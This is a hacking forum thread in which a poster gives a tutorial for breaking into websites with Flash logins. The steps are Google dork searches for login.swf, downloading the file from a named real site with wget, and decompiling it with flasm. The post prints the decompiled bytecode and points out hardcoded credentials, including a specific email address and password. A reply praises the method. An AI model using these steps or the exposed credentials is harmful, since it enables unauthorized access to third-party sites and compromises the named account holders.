iExploit

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Apply for Membership

Top Posters

Who's Online (0)

Powered by Vanilla. Made with Bootstrap.
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
Cracking Flash Logins
  • The-Force
    Posts: 15
    Hi today i am going to show yo uhow easy it can be to enter a site with flash logins without having a acount the first thing we need to do is download a programme called flasm you can do this on backtrack by typing apt-get install flasm
    now we need to get a flash login page we can do this by doing a few google searches: 


    loging.swf
    inurl:login.swf


    Now you have found a site you would like to enter like below 
    http://www.pokerkaj.com/


    if we add to the end of the url login.swf you will see yo uhave just the login box,in backtrack you can type:
    wget http://www.pokerkaj.com/login.swf


    And it will download the login.swf file then all we have to do is open are console & type in flasm -d login.swf it should like:


    ovie 'login.swf' // flash 5, total frames: 3, frame rate: 10 fps, 170x109 px

    protect

    defineButton 20

    on overUpToOverDown
    push 'V'
    push '0'
    push '1'
    push 'String'
    new
    setVariable
    push 'z'
    push ''
    push '1'
    push 'String'
    new
    setVariable
    push 'z'
    push 'userBox'
    getVariable
    push 'passBox'
    getVariable
    concat
    setVariable
    push 'z'
    getVariable
    push 'Kaj20code20fm'
    stringEq
    not
    branchIfTrue label1
    push 'V'
    push '1'
    setVariable
    getURL 'http://www.pokerkaj.com/frontpage.html' '_self'
    label1:
    push 'z'
    getVariable
    push 'Overkaj12345'
    stringEq
    not
    branchIfTrue label2
    push 'V'
    push '1'
    setVariable
    getURL 'http://www.pokerkaj.com/frontpage.html' '_self'
    label2:
    push 'z'
    getVariable
    push 'tte@fujitsu.dk20code20fm'
    stringEq
    not
    branchIfTrue label3
    push 'V'
    push '1'


    if you notice it has a table called push & a email address next to it like this push 
    'tte@fujitsu.dk20code20fm'


    all you need is the email tte@fujitsu.dk
    & the password is in that same striing
    password: 20code20fm


    This dose not work on all flash logins but most of them it does also some logins do not require a password & only have a urser name ;)

    cheers...
  • Xin
    Posts: 3,251
    Great share, this is simillar to decompiling flash games to make game trainers etc, never though of it this way.
    Xin
Add a Comment